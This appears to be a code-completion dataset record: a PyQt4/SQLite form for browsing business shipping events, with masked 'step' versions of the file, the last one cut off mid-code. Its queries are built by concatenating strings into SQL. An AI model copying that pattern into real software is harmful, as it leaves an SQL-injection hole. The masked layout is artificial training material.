while query.next():
recCount = recCount + 1
if query.value(2).toString() != '':
query_Origin = QtSql.QSqlQuery()
query_Origin.exec_("Select Name from Cities where ID = '" + query.value(2).toString() + "' LIMIT 1")
query_Origin.next()
modelInputItem = QtGui.QStandardItem("Origin")
modelInputValue = QtGui.QStandardItem(query_Origin.value(0).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(3).toString() != '':
query_Destination = QtSql.QSqlQuery()
query_Destination.exec_("Select Name from Cities where ID = '" + query.value(3).toString() + "' LIMIT 1")
query_Destination.next()
modelInputItem = QtGui.QStandardItem("Destination")
modelInputValue = QtGui.QStandardItem(query_Destination.value(0).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(4).toString() != '':
modelInputItem = QtGui.QStandardItem("Weight")
modelInputValue = QtGui.QStandardItem(query.value(4).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(5).toString() != '':
modelInputItem = QtGui.QStandardItem("Volume")
modelInputValue = QtGui.QStandardItem(query.value(5).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(6).toString() != '':
modelInputItem = QtGui.QStandardItem("Time of Entry")
modelInputValue = QtGui.QStandardItem(query.value(6).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(7).toString() != '':
modelInputItem = QtGui.QStandardItem("Priority")
modelInputValue = QtGui.QStandardItem(query.value(7).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(8).toString() != '':
modelInputItem = QtGui.QStandardItem("Price Per Gram")
modelInputValue = QtGui.QStandardItem(query.value(8).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(9).toString() != '':
modelInputItem = QtGui.QStandardItem("Price Per CC")
modelInputValue = QtGui.QStandardItem(query.value(9).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(10).toString() != '':
modelInputItem = QtGui.QStandardItem("Company")
modelInputValue = QtGui.QStandardItem(query.value(10).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(11).toString() != '':
modelInputItem = QtGui.QStandardItem("Transport Type")
modelInputValue = QtGui.QStandardItem(query.value(11).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(12).toString() != '':
modelInputItem = QtGui.QStandardItem("Day of the Week")
modelInputValue = QtGui.QStandardItem(query.value(12).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(13).toString() != '':
modelInputItem = QtGui.QStandardItem("Frequency")
modelInputValue = QtGui.QStandardItem(query.value(13).toString())
modelView.appendRow([modelInputItem,modelInputValue])
if query.value(14).toString() != '':
modelInputItem = QtGui.QStandardItem("Duration")
modelInputValue = QtGui.QStandardItem(query.value(14).toString())
modelView.appendRow([modelInputItem,modelInputValue])
#modelInputValue = QtGui.QStandardItem('Value')
# modelView.appendRow([modelInputItem,modelInputValue])
if recCount == 0:
self.label_3.setText(_translate("Form", "No Records found", None))
self.inWork = False
else:
self.label_3.setText(_translate("Form", "", None))
self.inWork = True
self.tb_EventViewer.setModel(modelView)
def clicked_bt_Earlier(self):
self.eventSkip = self.eventSkip + 1
self.handleChanged(self.cb_EventType.currentText())
def clicked_bt_Later(self):
if self.eventSkip > 0:
self.eventSkip = self.eventSkip - 1
self.handleChanged(self.cb_EventType.currentText())
class Database:
def __init__(self, parent = None):
self.data = QtSql.QSqlDatabase.addDatabase("QSQLITE")
self.data.setDatabaseName("../Database/Business.db")
self.data.open()
|
normal
|
{
"blob_id": "8339113fd6b0c286cc48ec04e6e24978e2a4b44e",
"index": 9991,
"step-1": "<mask token>\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n <mask token>\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n <mask token>\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-2": "<mask token>\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(3).toString() != '':\n query_Destination = QtSql.QSqlQuery()\n query_Destination.exec_(\n \"Select Name from Cities where ID = '\" + query.value(3)\n .toString() + \"' LIMIT 1\")\n query_Destination.next()\n modelInputItem = QtGui.QStandardItem('Destination')\n modelInputValue = QtGui.QStandardItem(query_Destination.\n value(0).toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(4).toString() != '':\n modelInputItem = QtGui.QStandardItem('Weight')\n modelInputValue = QtGui.QStandardItem(query.value(4).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(5).toString() != '':\n modelInputItem = QtGui.QStandardItem('Volume')\n modelInputValue = QtGui.QStandardItem(query.value(5).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(6).toString() != '':\n modelInputItem = QtGui.QStandardItem('Time of Entry')\n modelInputValue = QtGui.QStandardItem(query.value(6).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(7).toString() != '':\n modelInputItem = QtGui.QStandardItem('Priority')\n modelInputValue = QtGui.QStandardItem(query.value(7).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(8).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per Gram')\n modelInputValue = QtGui.QStandardItem(query.value(8).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(9).toString() != '':\n modelInputItem = QtGui.QStandardItem('Price Per CC')\n modelInputValue = QtGui.QStandardItem(query.value(9).toString()\n )\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(10).toString() != '':\n modelInputItem = QtGui.QStandardItem('Company')\n modelInputValue = QtGui.QStandardItem(query.value(10).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(11).toString() != '':\n modelInputItem = QtGui.QStandardItem('Transport Type')\n modelInputValue = QtGui.QStandardItem(query.value(11).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(12).toString() != '':\n modelInputItem = QtGui.QStandardItem('Day of the Week')\n modelInputValue = QtGui.QStandardItem(query.value(12).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(13).toString() != '':\n modelInputItem = QtGui.QStandardItem('Frequency')\n modelInputValue = QtGui.QStandardItem(query.value(13).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if query.value(14).toString() != '':\n modelInputItem = QtGui.QStandardItem('Duration')\n modelInputValue = QtGui.QStandardItem(query.value(14).\n toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n if recCount == 0:\n self.label_3.setText(_translate('Form', 'No Records found', None))\n self.inWork = False\n else:\n self.label_3.setText(_translate('Form', '', None))\n self.inWork = True\n self.tb_EventViewer.setModel(modelView)\n\n def clicked_bt_Earlier(self):\n self.eventSkip = self.eventSkip + 1\n self.handleChanged(self.cb_EventType.currentText())\n\n def clicked_bt_Later(self):\n if self.eventSkip > 0:\n self.eventSkip = self.eventSkip - 1\n self.handleChanged(self.cb_EventType.currentText())\n\n\nclass Database:\n\n def __init__(self, parent=None):\n self.data = QtSql.QSqlDatabase.addDatabase('QSQLITE')\n self.data.setDatabaseName('../Database/Business.db')\n self.data.open()\n",
"step-3": "<mask token>\ntry:\n _fromUtf8 = QtCore.QString.fromUtf8\nexcept AttributeError:\n\n def _fromUtf8(s):\n return s\ntry:\n _encoding = QtGui.QApplication.UnicodeUTF8\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\nexcept AttributeError:\n\n def _translate(context, text, disambig):\n return QtGui.QApplication.translate(context, text, disambig)\n\n\nclass Ui_Form(object):\n\n def setupUi(self, Form):\n Form.setObjectName(_fromUtf8('Form'))\n Form.resize(666, 538)\n palette = QtGui.QPalette()\n self.eventSkip = 0\n self.db = Database()\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)\n self.inWork = True\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)\n brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)\n Form.setPalette(palette)\n self.tb_EventViewer = QtGui.QTableView(Form)\n self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))\n self.tb_EventViewer.setObjectName(_fromUtf8('tb_EventViewer'))\n self.tb_EventViewer.horizontalHeader().setVisible(False)\n self.tb_EventViewer.verticalHeader().setVisible(False)\n self.bt_Earlier = QtGui.QPushButton(Form)\n self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))\n self.bt_Earlier.setObjectName(_fromUtf8('bt_Earlier'))\n self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)\n self.bt_Later = QtGui.QPushButton(Form)\n self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))\n self.bt_Later.setObjectName(_fromUtf8('bt_Later'))\n self.bt_Later.clicked.connect(self.clicked_bt_Later)\n self.label = QtGui.QLabel(Form)\n self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText,\n brush)\n self.label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI Light'))\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.label.setFont(font)\n self.label.setObjectName(_fromUtf8('label'))\n self.cb_EventType = QtGui.QComboBox(Form)\n self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))\n self.cb_EventType.setObjectName(_fromUtf8('cb_EventType'))\n self.cb_EventType.currentIndexChanged['QString'].connect(self.\n handleChanged)\n self.label_2 = QtGui.QLabel(Form)\n self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))\n self.label_3 = QtGui.QLabel(Form)\n self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n self.label_2.setPalette(palette)\n self.label_3.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(_fromUtf8('Segoe UI'))\n font.setPointSize(12)\n self.label_2.setFont(font)\n self.label_2.setObjectName(_fromUtf8('label_2'))\n self.label_3.setFont(font)\n self.label_3.setObjectName(_fromUtf8('label_3'))\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n self.initialize()\n\n def retranslateUi(self, Form):\n Form.setWindowTitle(_translate('Form', 'Revisit business events', None)\n )\n self.bt_Earlier.setText(_translate('Form', '<<', None))\n self.bt_Later.setText(_translate('Form', '>>', None))\n self.label.setText(_translate('Form', 'Revisit business events', None))\n self.label_2.setText(_translate('Form', 'Select Event Type', None))\n\n def initialize(self):\n self.cb_EventType.addItems(self.getBusinessEventsType())\n\n def getBusinessEventsType(self):\n conn = sqlite3.connect('../Database/Business.db')\n conn.text_factory = str\n c = conn.cursor()\n c.execute('SELECT Event FROM EventTypes')\n locs = [r[0] for r in c.fetchall()]\n conn.close()\n return locs\n\n def handleChanged(self, text):\n modelView = QtGui.QStandardItemModel()\n query = QtSql.QSqlQuery()\n query.exec_(\n \"Select * from BusinessEvents a, EventTypes b where b.Event = '\" +\n text +\n \"' and b.EventTypeID = a.EventTypeID order by ID DESC LIMIT \" +\n str(self.eventSkip) + ',1')\n recCount = 0\n while query.next():\n recCount = recCount + 1\n if query.value(2).toString() != '':\n query_Origin = QtSql.QSqlQuery()\n query_Origin.exec_(\"Select Name from Cities where ID = '\" +\n query.value(2).toString() + \"' LIMIT 1\")\n query_Origin.next()\n modelInputItem = QtGui.QStandardItem('Origin')\n modelInputValue = QtGui.QStandardItem(query_Origin.value(0)\n .toString())\n modelView.appendRow([modelInputItem, modelInputValue])\n 